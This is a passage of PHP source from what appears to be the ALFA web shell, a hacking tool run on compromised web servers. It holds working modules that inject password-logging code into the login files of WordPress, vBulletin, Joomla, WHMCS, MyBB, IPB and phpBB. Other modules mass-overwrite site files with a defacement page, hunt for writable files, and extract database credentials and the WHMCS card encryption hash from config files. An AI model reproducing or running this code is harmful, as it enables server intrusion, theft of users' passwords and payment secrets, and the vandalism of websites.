echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
$dirzip = $_POST['alfa3'];
$zipfile = $_POST['alfa4'];
if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
$code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
$newfunc = create_function('$source,$destination', $code);
if($newfunc($dirzip, $zipfile)){
echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
}else{
alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
}}
echo '</div>';
alfafooter();
}
function alfacmshijacker(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo '<div class=header><br>
<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
echo("</select>");
echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
<input type="submit" name="btn" value=" "></form></center><br>';
$cms = $_POST['alfa1'];
$saveto = $_POST['alfa2'];
$cmspath = $_POST['alfa4'];
if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
echo __pre();
alfaHijackCms($cms,$cmspath,$saveto);
}
echo '</div>';
alfafooter();
}
function alfaHijackCms($cms,$cmspath,$saveto){
switch($cms){
case "vb":
hijackvBulletin($cmspath,$saveto);
break;
case "wp":
hijackwp($cmspath,$saveto);
break;
case "jom":
hijackJoomla($cmspath,$saveto);
break;
case "whmcs":
hijackWhmcs($cmspath,$saveto);
break;
case "mybb":
hijackMybb($cmspath,$saveto);
break;
case "ipb":
hijackIPB($cmspath,$saveto);
break;
case "phpbb":
hijackPHPBB($cmspath,$saveto);
break;
default:
echo "error!";
break;
}
}
function hijackvBulletin($path,$saveto){
$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
$code=str_replace('{saveto_path}',$saveto,$code);
$login = $path."/login.php";
$class = $path."/includes/class_bootstrap.php";
$dologin = 'do_login_redirect();';
$evil_login = "\t".$code."\n\t".$dologin;
$evil_class = "true";
if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
$data_login = @file_get_contents($login);
$data_class = @file_get_contents($class);
if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
$login_replace = str_replace($dologin,$evil_login, $data_login);
$class_replace = str_replace($clearpw,$evil_class, $data_class);
@file_put_contents($login, $login_replace);
@file_put_contents($class, $class_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackwp($path,$saveto){
$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
$redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/wp-login.php";
$evil_login = "\t".$redirect_wp."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $redirect_wp)){
$login_replace = str_replace($redirect_wp,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackJoomla($path,$saveto){
$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
$code=str_replace('{saveto_path}',$saveto,$code);
$comp=$path."/administrator/components/com_login/";
if(@is_file($comp."/login.php")){
$login = $comp."/login.php";
}elseif(@is_file($comp."/admin.login.php")){
$login = $comp."/admin.login.php";
}else{
$login = '';
}
if(@is_file($login) AND @is_writable($login) AND $login != ''){
$data_login = @file_get_contents($login);
$evil_login = $code."\n".$data_login;
@file_put_contents($login, $evil_login);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackWhmcs($path,$saveto){
$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
$code=str_replace('{saveto_path}',$saveto,$code);
$conf=$path."/configuration.php";
if(@is_file($conf) AND @is_writable($conf)){
$data_conf = @file_get_contents($conf);
if(!strstr($data_conf,'?>'))$code = '?>'.$code;
$evil_conf = $data_conf."\n".$code;
@file_put_contents($conf, $evil_conf);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}
function hijackMybb($path,$saveto){
$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
$find = '$loginhandler->complete_login();';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/member.php";
$evil_login = "\t".$code."\n\t".$find;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackIPB($path,$saveto){
$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
$find = 'unset( $member[\'plainPassword\'] );';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/admin/sources/handlers/han_login.php";
$evil_login = "\t".$find."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackPHPBB($path,$saveto){
$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
$find = 'case \'login\':';
$code=str_replace('{saveto_path}',$saveto,$code);
$login=$path."/ucp.php";
$evil_login = "\t".$find."\n\t".$code;
if(@is_file($login) AND @is_writable($login)){
$data_login = @file_get_contents($login);
if(strstr($data_login, $find)){
$login_replace = str_replace($find,$evil_login, $data_login);
@file_put_contents($login, $login_replace);
hijackOutput(0,$saveto);
}else{
hijackOutput(1);
}
}else{
hijackOutput(1);
}
}
function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
if(@is_dir($dir)){
$files=@scandir($dir);
foreach($files as $key => $value){
$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
if(!@is_dir($path)){
if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
if($e=='str'){
$content = @file_get_contents($path);
if(strpos($content, $string) !== false){
echo str_replace('\\','/',$path) . "<br>";
}
}else{
if(strstr($value,$string)){
echo str_replace('\\','/',$path) . "<br>";
}
}
$results[] = $path;
}elseif($value != "." && $value != "..") {
Alfa_StrSearcher($path,$string,$ext,$e,$results);
$results[] = $path;
}}}}
function alfasearcher(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$ext = $_POST['alfa3'];
$method = $_POST['alfa4'];
if($_POST['alfa5']=='>>'){
echo __pre();
if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
Alfa_Searcher($dir,trim($ext),$method);
}
}
if($_POST['alfa1']=='str'){
echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
<div class="txtfont">
Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
$dir = $_POST['alfa2'];
$string = $_POST['alfa3'];
$ext = $_POST['alfa5'];
if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
echo __pre();
Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
}
}
echo '</div>';
alfafooter();
}
function alfaMassDefacer(){
alfahead();
AlfaNum(5,6,7,8,9,10);
echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
	Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
	DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
</form>';
$dir = $_POST['alfa1'];
$defpage = $_POST['alfa2'];
$method = $_POST['alfa3'];
$fCurrent = $GLOBALS['__file_path'];
if($_POST['alfa4'] == '>>'){
if(!empty($dir)){
if(@is_dir($dir)){
if(@is_readable($dir)){
if(@is_file($defpage)){
if($dh = @opendir($dir)){
echo __pre();
while (($file = @readdir($dh)) !== false){
if($file == '..' || $file == '.')continue;
$newfile=$dir.$file;
if($fCurrent == $newfile)continue;
if(@is_dir($newfile)){
Alfa_ReadDir($newfile,$method,$defpage);
}else{
if(!@is_writable($newfile))continue;
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}else{__alert('<font color="red">Error In OpenDir...</font>');}
}else{__alert('<font color="red">DefPage File NotFound...</font>');}
}else{__alert('<font color="red">Directory is not Readable...</font>');}
}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
}else{__alert('<font color="red">Dir is Empty...</font>');}
}
echo '</div>';
alfafooter();
}
function Alfa_ReadDir($dir,$method='',$defpage=''){
if(!@is_readable($dir)) return false;
if (@is_dir($dir)) {
if ($dh = @opendir($dir)) {
while(($file=readdir($dh))!==false) {
if($file == '..' || $file == '.')continue;
$newfile=$dir.'/'.$file;
if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
if(@is_file($newfile)){
if(!@is_readable($newfile))continue;
Alfa_Rewriter($newfile,$file,$defpage,$method);
}
}
closedir($dh);
}
}
}
function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
if(!@is_writable($dir)) return false;
if(!@is_readable($dir)) return false;
$defpage=@file_get_contents($defpage);
if($m == 'index'){
$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
if(in_array(strtolower($file),$indexs)){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
}
}elseif($m=='all'){
@file_put_contents($dir,$defpage);
echo @is_file($dir)?$dir."  <b><font color='red'>DeFaced...</b></font><br>" : '';
}
}
function alfaGetDisFunc(){
alfahead();
echo '<div class="header">';
$disfun = @ini_get('disable_functions');
$s = explode(',',$disfun);
$f = array_unique($s);
echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
$i=1;
foreach($f as $s){
$s=trim($s);
if(function_exists($s)||!is_callable($s))continue;
echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
$i++;
}
echo '</table></center>';
echo '</div>';
alfafooter();
}
function Alfa_Create_A_Tag($action,$vals){
$nulls = array();
foreach($vals as $key => $val){
echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
$f = implode(',',$nulls);
echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
unset($nulls);
}
}
function Alfa_Searcher($dir, $ext, $method) {
if(@is_readable($dir)){
if($method == 'all')$ext = '*';
if($method == 'dirs')$ext = '*';
$globFiles = @glob("$dir/*.$ext");
$globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
$blacklist = array();
foreach ($globDirs as $dir) {
if(!@is_readable($dir)) continue;
@Alfa_Searcher($dir, $ext, $method);
}
switch($method){
case "files":
foreach ($globFiles as $file){
if(@is_writable($file)){
echo "$file<br>";
}
}
break;
case "dirs":
foreach ($globFiles as $file){
if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
echo dirname($file).'<br>';
$blacklist[] = dirname($file);
}
}
break;
case "all":
foreach ($globFiles as $file){
echo $file.'<br>';
}
break;
}
unset($blacklist);
}
}
function AlfaiFrameCreator($f,$width='100%',$height='600px'){
return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
}
class AlfaCURL {
public $headers;
public $user_agent;
public $compression;
public $cookie_file;
public $proxy;
public $path;
public $ssl = false;
public $curl_status = true;
function __construct($cookies=false,$compression='gzip',$proxy=''){
if(!extension_loaded('curl')){$curl_status = false;return false;}
$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if($this->cookies)$this->cookie($this->path);
}
function cookie($cookie_file) {
if (_alfa_file_exists($cookie_file,false)) {
$this->cookie_file=$cookie_file;
}else{
@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
$this->cookie_file=$cookie_file;
@fclose($this->cookie_file);
}
}
function Send($url,$method="get",$data=""){
if(!$this->curl_status){return false;}
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if($this->ssl){
curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
}
if($this->cookies){
curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
}
if($this->proxy){
curl_setopt($process, CURLOPT_PROXY, $this->proxy);
}
if($method=='post'){
curl_setopt($process, CURLOPT_POSTFIELDS, $data);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
$return = curl_exec($process);
curl_close($process);
return $return;
}
function error($error) {
echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
die;
}
}
function getConfigHtml($cms){
$content = '';
$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
$content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
foreach($cms_array as $key => $val){
$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
}
$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
$content .= "</form>";
return $content;
}
function alfaGetConfig(){
$cms = $_POST['alfa1'];
$path = trim($_POST['alfa2']);
$config = array(
'wp'=>array('file'=>'/wp-config.php',
'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'drupal'=>array('file'=>'/config.php',
'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
),
'vb'=>array('file'=>'/includes/config.php',
'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'phpnuke'=>array('file'=>'/config.php',
'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
),
'smf'=>array('file'=>'/Settings.php',
'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'whmcs'=>array('file'=>'/configuration.php',
'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'joomla'=>array('file'=>'/configuration.php',
'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'phpbb'=>array('file'=>'/config.php',
'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
),
'mybb'=>array('file'=>'/inc/config.php',
'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
)
);
$data = array();
$srch_host = $config[$cms]['host'][0];
$srch_user = $config[$cms]['dbuser'][0];
$srch_name = $config[$cms]['dbname'][0];
$srch_pw = $config[$cms]['dbpw'][0];
$prefix = $config[$cms]['prefix'][0];
$file = $config[$cms]['file'];
$chost = $config[$cms]['host'][1];
$cuser = $config[$cms]['dbuser'][1];
$cname = $config[$cms]['dbname'][1];
$cpw = $config[$cms]['dbpw'][1];
$cprefix = $config[$cms]['prefix'][1];
if(@is_dir($path)||_alfa_is_dir($path)){
$file=$path.$file;
}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
$file=$path;
}else{
return false;
}
$file = __read_file($file);
if(preg_match($srch_host, $file, $mach)){
$data['host'] = $mach[$chost];
}
if(preg_match($srch_user, $file, $mach)){
$data['user'] = $mach[$cuser];
}
if(preg_match($srch_name, $file, $mach)){
$data['dbname'] = $mach[$cname];
}
if(preg_match($srch_pw, $file, $mach)){
$data['password'] = $mach[$cpw];
}
if(isset($prefix)){
if(preg_match($prefix, $file, $mach)){
$data['prefix'] = $mach[$cprefix];
}
}
if($cms=='whmcs'){
if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
$data['cc_encryption_hash'] = $mach[3];
}
}
echo json_encode($data);
}
if(empty($_POST['a']))
if(isset($default_action) && function_exists('alfa' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'FilesMan';
if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
